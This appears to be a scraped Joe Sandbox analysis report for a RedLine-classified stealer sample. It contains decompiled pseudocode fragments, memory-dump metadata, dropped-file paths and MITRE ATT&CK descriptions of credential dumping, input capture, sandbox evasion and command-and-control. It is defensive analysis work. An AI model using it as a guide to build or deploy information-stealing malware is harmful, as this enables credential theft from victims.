				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E0138D261(_t48);
						E0138CCA8(_t48, _t57, 0, 0x14a5bd0, 0, 0x14a5bd0, 0x104);
						_t26 =  *0x14a5d04; // 0xa735c8
						 *0x14a5cf4 = 0x14a5bd0;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x14a5bd0;
							_v20 = 0x14a5bd0;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E01382D2F(E01382BBB( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E01382BBB( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E0138CBD6(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x14a5cf8 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x14a5cfc = _t58;
											L18:
											E013871B2(_t37);
											_v12 = 0;
											L19:
											E013871B2(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x14a5cf8 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x14a5cfc = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E0137FD24(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E0137FD24(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E0138013F();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x01382a85
0x01382a8e
0x01382a93
0x01382a9d
0x01382aa0
0x01382abd
0x01382abe
0x01382ad1
0x01382ad6
0x01382ade
0x01382ae4
0x01382ae7
0x01382ae9
0x01382af0
0x01382af0
0x01382af2
0x01382af5
0x01382af8
0x01382aff
0x01382b18
0x01382b1d
0x01382b1f
0x01382b40
0x01382b48
0x01382b4b
0x01382b66
0x01382b69
0x01382b70
0x01382b74
0x01382b76
0x01382b7d
0x01382b80
0x01382b82
0x01382b84
0x01382b86
0x01382b90
0x01382b90
0x01382b92
0x01382b98
0x01382b9b
0x01382b9d
0x01382ba3
0x01382ba4
0x01382baa
0x01382bad
0x01382bae
0x01382bb4
0x01382bb7
0x00000000
0x00000000
0x00000000
0x00000000
0x01382b88
0x01382b88
0x01382b88
0x01382b8b
0x01382b8c
0x01382b8c
0x00000000
0x01382b88
0x01382b78
0x00000000
0x01382b78
0x01382b50
0x01382b50
0x01382b51
0x01382b56
0x01382b58
0x01382b5a
0x01382b5f
0x01382b5f
0x00000000
0x01382b5f
0x01382b21
0x01382b26
0x01382b28
0x01382b29
0x00000000
0x01382b29
0x01382aeb
0x01382aee
0x00000000
0x00000000
0x00000000
0x01382aee
0x01382aa2
0x01382aa5
0x00000000
0x00000000
0x01382aa7
0x01382aae
0x01382aaf
0x01382ab1
0x01382ab6
0x00000000
0x01382ab6
0x00000000

Strings

C:\Windows\Temp\321.exe, xrefs: 01382AC8, 01382ACF, 01382B05

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID:
String ID: C:\Windows\Temp\321.exe
API String ID: 0-1073121528
Opcode ID: 1f3ba4a9ff5f3a4512cf7196f3a422600a82a2ba3cbd6ec7384869e9da18ce37
Instruction ID: 82cbe4f427376dd527feace9b1a69c75e567204600088cd6755951a32b9f2b1f
Opcode Fuzzy Hash: 1f3ba4a9ff5f3a4512cf7196f3a422600a82a2ba3cbd6ec7384869e9da18ce37
Instruction Fuzzy Hash: 78419371A00319AFDB22FF9DD884D9FBBFCEF95314F1100A6E91197254DA708A40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013716B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E013716B9(void* __ebx, signed int* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v0;
				signed int _t37;
				signed int* _t55;
				signed int* _t70;
				signed int* _t71;

				_t53 = __ecx;
				_t70 = __ecx;
				E01375D4D(__ecx, 0);
				__ecx[1] = 0;
				__ecx[2] = 0;
				__ecx[3] = 0;
				__ecx[4] = 0;
				__ecx[5] = 0;
				__ecx[6] = 0;
				__ecx[7] = 0;
				__ecx[8] = 0;
				__ecx[9] = 0;
				__ecx[0xa] = 0;
				__ecx[0xb] = 0;
				__ecx[0xc] = 0;
				if(_v0 == 0) {
					E01375EBA("bad locale name");
					asm("int3");
					_push(_t70);
					_t71 = _t53;
					E01376191(_t53, _t71); // executed
					if(_t71[0xb] != 0) {
						E0137FF29(_t71[0xb]);
					}
					_t71[0xb] = 0;
					if(_t71[9] != 0) {
						E0137FF29(_t71[9]);
					}
					_t71[9] = 0;
					if(_t71[7] != 0) {
						E0137FF29(_t71[7]);
					}
					_t71[7] = 0;
					if(_t71[5] != 0) {
						E0137FF29(_t71[5]);
					}
					_t71[5] = 0;
					if(_t71[3] != 0) {
						E0137FF29(_t71[3]);
					}
					_t71[3] = 0;
					if(_t71[1] != 0) {
						E0137FF29(_t71[1]);
					}
					_t71[1] = 0;
					_t55 = _t71;
					_t37 =  *_t55;
					if(_t37 == 0) {
						return E013803E1(4);
					} else {
						if(_t37 < 8) {
							return E01377A7D(0x14a52d0 + _t37 * 0x18, 0x14a52d0 + _t37 * 0x18);
						}
						return _t37;
					}
				} else {
					E01376146(__ecx, __ecx, _a4);
					return _t70;
				}
			}

0x013716b9
0x013716bd
0x013716c0
0x013716c7
0x013716ca
0x013716cd
0x013716d0
0x013716d3
0x013716d6
0x013716da
0x013716dd
0x013716e1
0x013716e4
0x013716e7
0x013716ea
0x013716f1
0x0137170b
0x01371710
0x01371711
0x01371712
0x01371716
0x01371720
0x01371725
0x0137172a
0x0137172d
0x01371733
0x01371738
0x0137173d
0x0137173e
0x01371744
0x01371749
0x0137174e
0x0137174f
0x01371755
0x0137175a
0x0137175f
0x01371760
0x01371766
0x0137176b
0x01371770
0x01371771
0x01371777
0x0137177c
0x01371781
0x01371782
0x01371785
0x01375da5
0x01375da9
0x0138040e
0x01375daf
0x01375db2
0x00000000
0x01375dc2
0x01375dc3
0x01375dc3
0x013716f3
0x013716f8
0x01371703
0x01371703

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013716C0
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 013716F8

Part of subcall function 01376146: _Yarn.LIBCPMT ref: 01376165
Part of subcall function 01376146: _Yarn.LIBCPMT ref: 01376189

Strings

bad locale name, xrefs: 01371706

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: e6f61a505fa4daa848f8d9bab5da880d35b3b9daeec272a9b8a4c5fe9d8fbed0
Instruction ID: e435179d630dba50e5a1a60bb75624056215666bf8279b81f22aad47a65f45d5
Opcode Fuzzy Hash: e6f61a505fa4daa848f8d9bab5da880d35b3b9daeec272a9b8a4c5fe9d8fbed0
Instruction Fuzzy Hash: 5CF017B2506B809EC3759F6E9490443FBE4BE28215390CE2EE1DEC3A11D734E004CBAA

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1JCAVkYU3U.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_123.exe_e53c36ec8878b9d196e5e938606ed8f535f8_663869f4_11ae5358\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_321.exe_5a3d7538a657b059d8e1c0a59dbdaad7a4c02_db58721d_1a3a5367\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4202.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER438A.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4427.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4723.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER484C.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER48AB.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\gggge[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\json[1].json

C:\Users\user\AppData\Local\Temp\re.exe

Windows Analysis Report
1JCAVkYU3U.exe

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre